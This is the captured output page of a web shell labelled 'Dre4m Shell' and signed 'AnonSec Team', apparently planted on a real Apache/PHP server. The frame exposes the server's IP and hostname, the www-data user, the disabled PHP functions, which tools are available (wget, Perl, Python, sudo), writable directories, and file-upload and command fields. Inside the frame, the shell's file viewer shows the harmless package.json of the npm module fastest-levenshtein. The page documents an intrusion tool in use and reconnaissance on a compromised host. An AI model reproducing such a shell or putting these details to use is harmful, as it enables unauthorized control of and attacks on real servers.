Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 18.118.28.112
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /usr/lib/node_modules/npm/node_modules/fastest-levenshtein/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /usr/lib/node_modules/npm/node_modules/fastest-levenshtein/package.json
{
  "name": "fastest-levenshtein",
  "version": "1.0.16",
  "description": "Fastest Levenshtein distance implementation in JS.",
  "main": "mod.js",
  "types": "mod.d.ts",
  "module": "./esm/mod.js",
  "repository": {
    "type": "git",
    "url": "git+https://github.com/ka-weihe/fastest-levenshtein.git"
  },
  "keywords": [
    "levenshtein",
    "distance",
    "fast",
    "fastest",
    "edit",
    "string",
    "similarity",
    "algorithm",
    "match",
    "comparison",
    "fuzzy",
    "search",
    "string",
    "matching",
    "similar",
    "node",
    "difference"
  ],
  "author": "Kasper U. Weihe",
  "license": "MIT",
  "bugs": {
    "url": "https://github.com/ka-weihe/fastest-levenshtein/issues"
  },
  "homepage": "https://github.com/ka-weihe/fastest-levenshtein#README",
  "scripts": {
    "build": "tsc mod.ts --declaration",
    "build:esm": "tsc --declaration -p tsconfig.esm.json",
    "prepare": "npm run build && npm run build:esm",
    "bench": "npm run build && tsc bench.ts && node bench.js",
    "test": "npm run build && tsc test.ts && jest test.js",
    "test:coverage": "npm run build && jest --coverage",
    "test:coveralls": "npm run build && jest --coverage --coverageReporters=text-lcov | coveralls"
  },
  "devDependencies": {
    "@types/benchmark": "^1.0.33",
    "@types/jest": "^26.0.15",
    "@typescript-eslint/eslint-plugin": "^4.7.0",
    "@typescript-eslint/parser": "^4.7.0",
    "benchmark": "^2.1.4",
    "coveralls": "^3.1.0",
    "eslint": "^7.13.0",
    "eslint-config-node": "^4.1.0",
    "eslint-config-prettier": "^6.15.0",
    "eslint-plugin-import": "^2.22.1",
    "eslint-plugin-node": "^11.1.0",
    "eslint-plugin-prettier": "^3.1.4",
    "fast-levenshtein": "^2.0.6",
    "jest": "^26.6.3",
    "js-levenshtein": "^1.1.6",
    "leven": "^3.1.0",
    "levenshtein-edit-distance": "^2.0.5",
    "natural": "^2.1.5",
    "prettier": "^2.1.2",
    "talisman": "^1.1.3",
    "typescript": "^4.0.5"
  },
  "engines": {
    "node": ">= 4.9.1"
  }
}

Anon7 - 2022
AnonSec Team